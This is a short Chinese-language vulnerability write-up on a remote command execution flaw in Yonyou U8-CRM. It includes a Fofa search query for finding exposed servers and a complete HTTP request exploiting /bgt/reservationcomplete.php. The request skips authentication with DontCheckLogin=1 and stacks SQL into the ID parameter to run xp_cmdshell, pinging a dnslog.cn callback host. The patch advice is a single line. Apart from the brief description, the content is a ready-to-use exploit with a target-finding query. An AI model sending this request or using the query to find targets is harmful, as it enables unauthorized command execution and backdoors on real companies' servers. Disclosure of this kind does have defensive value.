0x01 产品描述:
用友U8-CRM是企业利用信息技术,是一项商业策略,它通过依据市场细分组织企业资源、培养以客户为中心的经营行为、执行以客户为中心的业务流程等手段来优化企业的客户满意度和获利能力。
0x02 漏洞描述:
用友U8-CRM系统 /reservationcomplete.php 接口存在远程命令执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞利用难度较低,建议受影响的用户尽快修复
0x03 搜索语句:
Fofa:title="用友U8CRM"
0x04 漏洞复现:
GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27ping%20.dnslog.cn%27; HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
Cookie: ID_LIST_OL_10_0_0_MessageItem__Subject=250; PHPSESSID=bgsessss-
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
0x05 修复建议:
厂商已发布补丁 请即时修复